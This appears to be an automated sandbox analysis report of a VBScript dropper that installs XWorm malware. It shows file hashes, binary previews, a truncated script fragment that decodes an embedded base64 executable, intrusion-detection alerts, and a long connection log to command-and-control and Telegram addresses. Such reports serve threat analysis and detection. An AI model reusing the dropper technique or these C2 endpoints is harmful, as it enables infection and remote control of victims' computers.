                                                  SHA-256:2617B945A4DA62FFC16A60F363A115B2711E99482B5D5CFBA6A755195EF087EA
                                                  SHA-512:640C1CC090084459C5FCE8DB601EA16EE4F002CD4AE20706EFB3C8BD284D1EB34942B6AC6AB39B516A8E102DE0AE7C6FDEF6B828C1F219AB31654E5ACF4B0139
                                                  Malicious:false
                                                  Preview:L..................F.... .../.,W..../.,W..../.,W.....\......................n.:..DG..Yr?.D..U..k0.&...&......Qg.*_...?.[M....<,.W........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=FY.u..........................3*N.A.p.p.D.a.t.a...B.V.1.....FY.u..Roaming.@......EW.=FY.u..........................V...R.o.a.m.i.n.g.....Z.2..\..FY.u .task.exe..B......FY.uFY.u....6.........................t.a.s.k...e.x.e.......Z...............-.......Y..............N.....C:\Users\user\AppData\Roaming\task.exe........\.....\.....\.....\.....\.t.a.s.k...e.x.e.`.......X.......932923...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):220160
                                                  Entropy (8bit):7.837208956478675
                                                  Encrypted:false
                                                  SSDEEP:6144:Ea2q0ShjvylwVJMRNKvXo1zKENuKOmFUA23:hDhj6lwmQvY1zJNuIGl3
                                                  MD5:0C3A47BC813554D40583861DDCDE06B8
                                                  SHA1:3D8E14459F4C0402A8C9DCA0F4336BFE9A9F5A5C
                                                  SHA-256:27F0C4307847174E4D202AC189C9D316EE72451A0B6D5338EB6F3276D5C5ADFA
                                                  SHA-512:6A049F521892AD387466616F774763A6FD522605E0E3B21D6B18E8AFA7644D92B1DE8739F62C584AACAEC9A043383EDD340707C5CC200E5027F5583E2E85CC67
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.g.........."...0...................... ....@.. ....................................@.................................."..K.......................................................................................................H...........dCoc.B{...... ......................@....text... ........................... ..`.rsrc................R..............@..@.....................X.............. ..`.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:ASCII text, with very long lines (65377), with CRLF line terminators
                                                  Entropy (8bit):5.968728386673498
                                                  TrID:
                                                    File name:SOA-injazfe-10424.vbs
                                                    File size:294'802 bytes
                                                    MD5:d1d114a2cb6d4a5fcc20e0db06755948
                                                    SHA1:eafdcba5d2d41934ae19628ac35675f7fce924c1
                                                    SHA256:f71d04f863721491823b5ed2b83d2f30d67084025bf7ea9fc52c615ba0fd3040
                                                    SHA512:5473b2c0b0263934fcd6ac9e712b09830df32ee61a5829ab6bfed2f634044124c13ca20157f3cf6634e90fe5192f44efd07e1fef6cd649907e09b6ed9879bb8e
                                                    SSDEEP:6144:4J6ej/Tyn/Jx+tJKE5FrWbd7Jq11BpXt4ag:Jm/TyCJlroU11B85
                                                    TLSH:9954BE318804BA1FCEEF2F9775141FD37CB8293BCE551428A84F49B95A68234297BF60
                                                    File Content Preview:Const XML_TYPE = "MSXML2.DOMDocument"..Const ELEMENT_TYPE = "text"..Const DATA_TYPE = "bin.base64"....Dim base64EncodedString, tempFolderPath, executablePath..base64EncodedString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Icon Hash:68d69b8f86ab9a86
                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                    2024-10-06T16:45:11.941778+0200 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.7 | 49701 | 149.154.167.220 | 443 | TCP
                                                    2024-10-06T16:45:51.394858+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49494 | 45.88.91.147 | 7000 | TCP
                                                    2024-10-06T16:46:25.707078+0200 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49621 | 45.88.91.147 | 7000 | TCP
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Oct 6, 2024 16:45:08.403634071 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                                                    Oct 6, 2024 16:45:08.408487082 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                                                    Oct 6, 2024 16:45:08.408565044 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                                                    Oct 6, 2024 16:45:08.409285069 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                                                    Oct 6, 2024 16:45:08.415838003 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                                                    Oct 6, 2024 16:45:08.869294882 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                                                    Oct 6, 2024 16:45:08.925240040 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                                                    Oct 6, 2024 16:45:10.872031927 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:10.872076035 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:10.872181892 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:10.929267883 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:10.929284096 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.561496973 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.561616898 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:11.565637112 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:11.565649986 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.565978050 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.612472057 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:11.625113964 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:11.671406984 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.941915989 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.942095041 CEST | 443 | 49701 | 149.154.167.220 | 192.168.2.7
                                                    Oct 6, 2024 16:45:11.942148924 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:11.953571081 CEST | 49701 | 443 | 192.168.2.7 | 149.154.167.220
                                                    Oct 6, 2024 16:45:12.107999086 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:12.112803936 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:12.112915039 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:12.161710024 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:12.166778088 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:24.820848942 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:24.825754881 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:33.688196898 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:33.688258886 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:33.690486908 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:33.690552950 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:36.987730026 CEST | 49712 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:36.989156961 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:36.993815899 CEST | 7000 | 49712 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:36.993999958 CEST | 7000 | 49494 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:36.994090080 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:37.010667086 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:37.015470982 CEST | 7000 | 49494 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:51.293524981 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                                                    Oct 6, 2024 16:45:51.293623924 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                                                    Oct 6, 2024 16:45:51.394857883 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:45:51.399817944 CEST | 7000 | 49494 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:58.393225908 CEST | 7000 | 49494 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:45:58.393357992 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:00.019161940 CEST | 49494 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:00.024650097 CEST | 7000 | 49494 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:00.030081987 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:00.034873962 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:00.034945965 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:00.055135012 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:00.061414957 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:09.395214081 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:09.400008917 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:09.457082033 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:09.461899042 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:09.831866980 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:09.836785078 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:10.472939968 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:10.479165077 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:10.660299063 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:10.972317934 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:11.559627056 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:11.559640884 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:11.597732067 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:11.602886915 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:11.675589085 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:11.686686039 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:11.816214085 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:11.821443081 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:12.097532988 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:12.102534056 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:12.144304991 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:12.149291039 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:12.207009077 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:12.211954117 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.347594023 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.352777004 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.519676924 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.524482965 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.535048962 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.539823055 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.597610950 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.602420092 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.613343000 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.618175030 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.660185099 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.664932013 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.722795963 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.727650881 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.769433022 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.774208069 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.785273075 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.790034056 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.800652981 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.805460930 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.816169024 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.820914030 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.847417116 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.852246046 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.863107920 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.867959976 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.894393921 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.899174929 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:13.925721884 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:13.930545092 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.097582102 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.102427959 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.144403934 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.149203062 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.175677061 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.180490017 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.191272020 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.196008921 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.206864119 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.211786985 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.253639936 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.259035110 CEST | 7000 | 49620 | 45.88.91.147 | 192.168.2.7
                                                    Oct 6, 2024 16:46:14.425658941 CEST | 49620 | 7000 | 192.168.2.7 | 45.88.91.147
                                                    Oct 6, 2024 16:46:14.430706024 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.410058022 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.414866924 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.472771883 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.477535963 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.769886017 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.774949074 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.270528078 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.275438070 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.363645077 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.368571043 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.535171986 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.540074110 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:17.519624949 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:17.524465084 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.238339901 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.243325949 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.269450903 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.274179935 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.332031965 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.340907097 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.410497904 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.415497065 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.269495010 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.274794102 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.535090923 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.539896965 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.550592899 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.555429935 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.597728968 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.603082895 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.660255909 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.665051937 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.722755909 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.727566957 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.738352060 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.743153095 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.769999981 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.774759054 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.925769091 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.930634975 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.941370964 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.946312904 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.019644976 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.041621923 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.363481045 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.368288994 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.426141977 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.430919886 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.332346916 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:21.338227034 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.404218912 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.404359102 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.973277092 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.977283001 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.978111029 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:24.982543945 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:24.985399961 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.010416031 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.015376091 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.691560030 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.704611063 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.707077980 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.711939096 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.769673109 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.775032997 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.847702980 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.853466988 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.863259077 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.868233919 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.894587040 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.900224924 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.925945997 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.931020021 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.957415104 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.962321043 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.988487005 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.993299007 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.363759995 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.368663073 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.769610882 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.774374008 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.785490036 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.790543079 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.833281040 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.838069916 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.504065037 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.508976936 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.519922018 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.524967909 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.535407066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.540544033 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.551031113 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.555882931 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.566678047 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.571687937 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.801244974 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.806144953 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.879061937 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.883898020 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.941531897 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.946593046 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.988168001 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.993021011 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.113754034 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.118685961 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.175817966 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.180701017 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.194955111 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.199809074 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.206949949 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.211888075 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.269608021 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.274529934 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.300888062 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.306242943 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.316525936 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.330074072 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.378827095 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.383955002 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.519812107 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.524754047 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.535470963 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.540242910 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.551101923 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.555905104 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.566625118 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.572099924 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.613445044 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.618324041 CEST70004962145.88.91.147192.168.2.7
